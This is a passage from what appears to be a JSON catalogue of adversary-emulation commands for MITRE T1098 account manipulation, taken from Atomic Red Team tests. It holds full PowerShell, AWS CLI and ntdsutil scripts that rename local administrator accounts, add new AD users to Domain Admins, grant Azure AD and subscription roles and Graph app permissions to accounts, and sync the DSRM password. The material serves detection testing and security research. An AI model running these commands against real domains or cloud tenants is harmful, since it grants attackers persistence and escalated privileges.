System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n", + "ntdsutil \"set dsrm password\" \"sync from domain account %username%\" \"q\" \"q\"\n", + "powershell/management/honeyhash", + "powershell/situational_awareness/network/powerview/set_ad_object" + ], + "commands": [ + { + "command": "$x = Get-Random -Minimum 2 -Maximum 9999\n$y = Get-Random -Minimum 2 -Maximum 9999\n$z = Get-Random -Minimum 2 -Maximum 9999\n$w = Get-Random -Minimum 2 -Maximum 9999\nWrite-Host HaHa_$x$y$z\n\n$fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match \"User\" -and $_.PrincipalSource -match \"Local\"} | Select Name\n\nforeach($member in $fmm) {\n if($member -like \"*Administrator*\") {\n $account = $member.Name -replace \".+\\\\\\\",\"\" # strip computername\\\n $originalDescription = (Get-LocalUser -Name $account).Description\n Set-LocalUser -Name $account -Description \"atr:$account;$originalDescription\".Substring(0,48) # Keep original name in description\n Rename-LocalUser -Name $account -NewName \"HaHa_$x$y$z\" # Required due to length limitation\n Write-Host \"Successfully Renamed $account Account on \" $Env:COMPUTERNAME\n }\n }\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "$x = Get-Random -Minimum 2 -Maximum 99\n$y = Get-Random -Minimum 2 -Maximum 99\n$z = Get-Random -Minimum 2 -Maximum 99\n$w = Get-Random -Minimum 2 -Maximum 99\n\nImport-Module ActiveDirectory\n$account = \"atr--$x$y$z\"\nNew-ADUser -Name $account -GivenName \"Test\" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}\nAdd-ADGroupMember \"#{group}\" $account\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "$x = Get-Random -Minimum 2 -Maximum 99\n$y = Get-Random -Minimum 2 -Maximum 99\n$z = Get-Random -Minimum 2 -Maximum 99\n$w = Get-Random -Minimum 2 -Maximum 99\n\nImport-Module ActiveDirectory\n$account = \"#{account_prefix}-$x$y$z\"\nNew-ADUser -Name $account -GivenName \"Test\" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}\nAdd-ADGroupMember \"Domain Admins\" $account\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "$x = Get-Random -Minimum 2 -Maximum 99\n$y = Get-Random -Minimum 2 -Maximum 99\n$z = Get-Random -Minimum 2 -Maximum 99\n$w = Get-Random -Minimum 2 -Maximum 99\n\nImport-Module ActiveDirectory\n$account = \"#{account_prefix}-$x$y$z\"\nNew-ADUser -Name $account -GivenName \"Test\" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False \nAdd-ADGroupMember \"#{group}\" $account\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "aws iam create-group --group-name atomicredteam\naws iam add-user-to-group --user-name atomicredteam --group-name atomicredteam\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"SuperUser\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"Global Reader\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.DisplayName)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.DisplayName)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"SuperSP\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.DisplayName)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"Global Reader\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.DisplayName)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"SuperUser\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"Reader\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"Azure subscription 1\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"SuperSP\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"Reader\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"Azure subscription 1\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"test_app\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"test_app\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('DirectoryRecommendations.Read.All')\n\n$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "ntdsutil \"set dsrm password\" \"sync from domain account %username%\" \"q\" \"q\"\n", + "source": 